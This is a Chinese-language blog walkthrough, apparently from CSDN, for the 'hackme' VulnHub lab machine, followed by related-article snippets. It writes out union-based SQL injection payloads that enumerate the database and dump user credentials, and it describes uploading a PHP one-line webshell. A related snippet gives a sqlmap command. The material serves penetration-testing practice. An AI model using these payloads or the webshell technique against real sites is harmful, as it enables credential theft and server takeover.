hackme靶机攻略

最新推荐文章于 2024-09-03 20:00:15 发布
最新推荐文章于 2024-09-03 20:00:15 发布
阅读量179 收藏 1
点赞数 2
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78031880/article/details/141867487
版权

1.通过nmap扫描靶场ip

2.目录扫描

3.找出文件存储位置,看看哪里可以上传文件

4.注册账号登录一下

点击search

5.输入1' and 1=1 --+   1' and 1=2 --+看看有无SQL注入

6.判断字段数

1' order by 3 --+

说明字段数是3

7.查看数据库

-1' union select database(),2,3 #

8.查看数据库表名

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

9.查看user表所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #

10.查看数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

11.选择superadmin对应的密码2386acb2cf356944177746fc92523983进行md5解密

12.看到上传文件,然后上传一句话木马

13发现x.php上传上去了

14.进入查看

15用蚁剑连接

谪仙123
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hackme靶机渗透
m0_50584370的博客
06-01 245
hackme靶机渗透
hackme靶机通关攻略
kknifek的博客
09-03 375
1.先进行端口扫面,扫面和我们同一网段的靶机 2.找出靶机的ip 3.看看他有些什么目录 4.访问这些文件后我们先创建一个账户并登录 5.登录后输入sql语句' or 1=1#获得下图数据 6.再输入1进行抓包 7.用sqlmap验证是否存在sql注入 sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" -- cookie="PHPSESSID=gnpfr7rt8kbfco8383t
Hackme靶机通关攻略
最新发布
qq_65852138的博客
09-03 91
Hackme靶机通关攻略
HACKME:1靶机
JKding123的博客
10-22 973
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4003
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6568
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
HACK ME靶机
qq_49101841的博客
10-01 1194
❀本篇关于信息安全实训时靶场训练的操作笔记。
mysql-day02
m0_64370841的博客
08-29 2233
【代码】mysql-day02。
Redis基础命令和事务,redis持久化和主从复制
baomingshu的博客
08-31 1737
nosql数据库介绍:解释为 non-relational(非关系型数据库)。在NoSQL 数据库中数据之间是无联系的数据的结构是松散的,可变的。优势:大数据量,高性能,灵活的数据模型,高可用,低成本劣势:(1)无关系,数据之间是无联系的。
编译原理简介
m0_52796585的博客
09-01 919
编译原理是计算机科学中的一个核心领域,它涉及到将高级编程语言编写的源代码转换成机器语言的过程。这个过程对于计算机程序的运行至关重要,因为计算机硬件只能理解机器语言指令。编译原理不仅关注编译器的设计和实现,还涉及语言的语义、语法分析、代码优化等多个方面。
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1766
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
您应该使用哪个矢量数据库? 选择最适合您需求的数据库
weixin_41446370的博客
09-01 1000
在现实世界中,并非所有数据都能整齐地排列成行和列。在处理复杂的非结构化数据(如图像、视频和自然语言)时尤其如此。矢量数据库是一种以高维矢量形式存储数据的数据库,本质上是代表对象特征或特性的数字列表。每个矢量对应一个独特的实体,如一段文本、图像或视频。但为什么要使用矢量呢?奥妙就在于它能够捕捉语义和相似性。通过将数据表示为向量,我们可以对它们进行数学比较,并确定它们的相似或不相似程度。这使我们能够执行复杂的查询,如 "为我查找与此相似的图片 "或 “检索与此文本语义相关的文档”。
MYSQL数据库初体验
qq_63994746的博客
08-28 2113
面向Windows操作系统简单、易用华为:欧拉阿里:龙蜥腾讯:tencentOS麒麟:(银河麒麟、中标麒麟 – >centos 优麒麟 – > Ubuntu )统信:uos红旗深度:deepin。
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 731
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
SpringBoot项目初始化搭建
weixin_63405049的博客
08-30 1792
本章主要讲解了SpringBoot项目初始化搭建,编程事务的使用,分页依赖的使用,以及跨域问题如何解决,解决了轻量级项目构建初期遇到的一些问题,提供于前后端交互时产生的问题进行分析与解决
CAS单点登录说明文档
大强博客
09-01 180
CAS单点登录说明文档
基于协同过滤算法的电影推荐系统的设计与实现(论文+源码)_kaic
weixin_52720882的博客
08-30 2046
2020年张志军在《基于协同过滤算法和强化学习的电影推荐系统》文章中提出了一种全新的电影推荐框架叫做CF-DQN推荐框架,它是基于协同过滤算法的改进的强化学习的电影推荐框架,用于实时的电影推荐。
MySQL 使用C语言链接
JK01WYX的博客
09-02 1292
mysql_get_client_info() ; msql_real_connect() ; mysql_query() ; mysql_store_result() ; mysql_num_rows() ; mysql_num_fields() ; mysql_fetch_fields() ; mysql_fetch_fields() ; mysql_close()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值